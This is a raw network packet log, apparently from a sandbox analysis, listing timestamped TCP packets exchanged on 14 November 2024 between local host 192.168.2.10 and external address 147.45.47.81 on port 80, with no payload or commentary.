                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425504923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425513983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425520897 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425524950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425534010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425544024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425554037 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.425578117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447293997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447433949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447446108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447474003 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447546959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447557926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.447591066 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.489834070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.489850998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.489861012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.489903927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.512363911 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.517959118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.517991066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518001080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518011093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518022060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518030882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518040895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518049955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518059969 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518070936 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518100977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518109083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518119097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518127918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518136978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518146038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518156052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518165112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518174887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518186092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518244982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518255949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518265009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518275023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518285036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518294096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518305063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518338919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518338919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518338919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518338919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518338919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518338919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518390894 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518390894 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518390894 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518390894 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518393040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518405914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518416882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518426895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518438101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518460035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518470049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518480062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518488884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518498898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518507004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518517971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518526077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518536091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518604040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518614054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518623114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518641949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518650055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518661022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518671036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518682003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518692017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518702030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518712044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518759012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518759012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518759012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518759012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518759012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518759012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518816948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518816948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518827915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518827915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.518827915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.519045115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.519067049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.519294977 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.519947052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.519959927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.519989967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520000935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520009995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520013094 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520020962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520031929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520035028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520041943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520052910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520062923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520068884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520123005 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520133018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520143032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520153046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520162106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520170927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520180941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520181894 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520181894 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520190001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520196915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520196915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520196915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520201921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520212889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520252943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520256042 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520266056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520276070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520286083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520294905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520298958 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520298958 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520307064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520317078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520324945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520333052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520342112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520353079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520360947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520370007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520366907 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520396948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520402908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520416021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520426035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520437002 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520539045 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520539045 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520539045 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520548105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520559072 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520559072 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520560980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520571947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520581961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520586967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520595074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520605087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520668983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520679951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520726919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520726919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520726919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520771980 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520857096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.520955086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521044016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521202087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521214008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521286964 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521384001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521394968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521464109 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521641016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521651983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.521748066 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524707079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524723053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524732113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524741888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524750948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524760962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524770975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524780035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524787903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524796963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524796009 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524820089 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524832010 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524832010 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524837971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524848938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524857998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524868011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524874926 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524876118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524887085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524894953 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524899960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524903059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.524946928 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542670012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542685032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542695045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542705059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542714119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542723894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542748928 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542773962 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542789936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542799950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542810917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542819023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542828083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542834044 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542857885 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542954922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542967081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542978048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.542999029 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543020010 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543122053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543133020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543169975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543334961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543344975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543356895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543365955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543375015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543384075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543390036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543441057 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543481112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543490887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543500900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543559074 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543657064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543667078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543673992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543678999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543684959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543689013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543706894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543775082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543899059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543910027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543920040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543927908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543937922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.543947935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544002056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544002056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544064999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544075012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544095993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544133902 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544219971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544230938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544235945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544241905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544291973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544363022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544393063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544455051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544465065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544473886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544483900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544497967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544507980 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544512987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544517994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544543982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544747114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544776917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544787884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544801950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544814110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544821024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544822931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.544857979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545003891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545017004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.545026064 CET8049958147.45.47.81192.168.2.10
